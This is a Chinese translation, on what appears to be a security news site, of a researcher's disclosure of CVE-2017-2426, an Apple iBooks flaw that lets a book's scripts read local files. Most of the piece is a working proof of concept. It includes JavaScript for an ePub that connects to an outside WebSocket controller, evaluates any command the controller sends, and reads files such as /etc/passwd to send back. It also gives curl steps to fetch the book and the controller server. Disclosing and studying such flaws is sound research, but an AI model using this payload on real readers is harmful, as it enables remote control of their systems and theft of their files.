【技术分享】CVE-2017-2426:苹果iBook正在利用JavaScript“读”你(含演示视频、POC)

阅读量110782

|

发布时间 : 2017-03-29 10:39:42

x
译文声明

本文是翻译文章,文章来源:s1gnalcha0s.github.io

原文地址:https://s1gnalcha0s.github.io/ibooks/epub/2017/03/27/This-book-reads-you-using-JavaScript.html

译文仅供参考,具体内容表达以及含义原文为准。

http://p1.qhimg.com/t01f45ca311d2932839.jpg

翻译:shan66

稿费:50RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


“是的,书很危险。它们应该是危险的——因为它们蕴含思想。”——彼得•豪特曼

在前一篇关于ePub解析器的文章(即,这本书正在读你——利用支持ePub书籍格式的服务和阅读软件)中,我提到了使用ePub的脚本功能对用户执行本地攻击的话题。

苹果刚刚公布了一个安全漏洞,即我去年在iBooks上报告的一个问题:允许在打开书籍时访问用户系统上的文件。 El Capitan的iBooks将使用file://origin打开一个ePub,这将允许攻击者在打开一本书时访问用户的文件系统。 (CVE-2017-2426

为了帮助演示如何使用这种方式对用户进行攻击,我将WebSocket客户端添加到了一本书中,以便打开该书的所有用户都将连接到一个WebSocket控制器服务器,该服务器可以为他们发送任意指令。 只要用户将书打开,ePub中的WebSocket客户端就处于允许访问的状态(如果向用户提供了值得阅读的内容的话,那么电子书就很可能会长时间处于打开状态)。

例如,向用户发送一本图书:

http://p8.qhimg.com/t0165bc78d5e64bd7a0.png

打开书籍时,iBooks将连接到WebSocket控制器:

http://p2.qhimg.com/t01eaed2acae09b50e3.png

连接到WebSockets控制器的iBooks。如果阅读器含有CVE-2017-2426(file://origin)漏洞的话,则攻击者就可以获取本地文件了:

http://p6.qhimg.com/t012a14a8ada0ded55a.png


演示视频

POC

您可以使用这里的POC书亲自试验一下。 您可以在Apple iBooks或Adobe Digital Editions等阅读器中打开它。

http://p5.qhimg.com/t01d5cd8e37ca2e005b.png

免责声明:虽然POC将连接到我的控制器,但我保证不会干任何坏事。

您也可以修改它,使其指向自己的控制器: 

    curl https://s1gnalcha0s.github.io/assets/controller/POC.epub -o poc.epub
    unzip poc.epub; rm poc.epub

poc.epub/epub/main.js的内容 

WebSocketController = 'ws://websocket-controller.herokuapp.com:80';
var socket = new WebSocket(WebSocketController, 'echo-protocol');
socket.onopen = function(evt) { onopen() };
socket.onmessage = function(msg) { onmessage(msg) };
socket.onclose = function(evt) { onerror() }
function onopen()
{
  message('Connected to WebSocket Controller: ' + WebSocketController);
}
function onerror()
{
  message('Unable to connect to WebSocket Controller: ' + WebSocketController);
}
function onmessage(msg)
{
  //just eval anything sent from the controller
  response = eval(msg.data);
  //send response back to controller
  socket.send(response);
}
function get(loc) {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open('GET', 'file://' + loc,false);
  xmlhttp.send();
  //populate the message element
  message(xmlhttp.responseText);
  return xmlhttp.responseText;
}
function message(message) {
  document.getElementById("message").innerText = message;
  return message;
}
function showExfil() {
  get('/etc/passwd');
}
    zip -r poc.epub *

Node.js WebSocket控制器

    curl https://s1gnalcha0s.github.io/assets/controller/server.js -o server.js
    npm install websocket
    node server.js

本文到此就结束了,祝阅读愉快! 

本文翻译自s1gnalcha0s.github.io 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
shan66
分享到:微信

发表评论

内容需知
  • 投稿须知
  • 转载须知
  • 官网QQ群8:819797106
  • 官网QQ群3:830462644(已满)
  • 官网QQ群2:814450983(已满)
  • 官网QQ群1:702511263(已满)
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 360网络攻防实验室 安全客 All Rights Reserved 京ICP备08010314号-66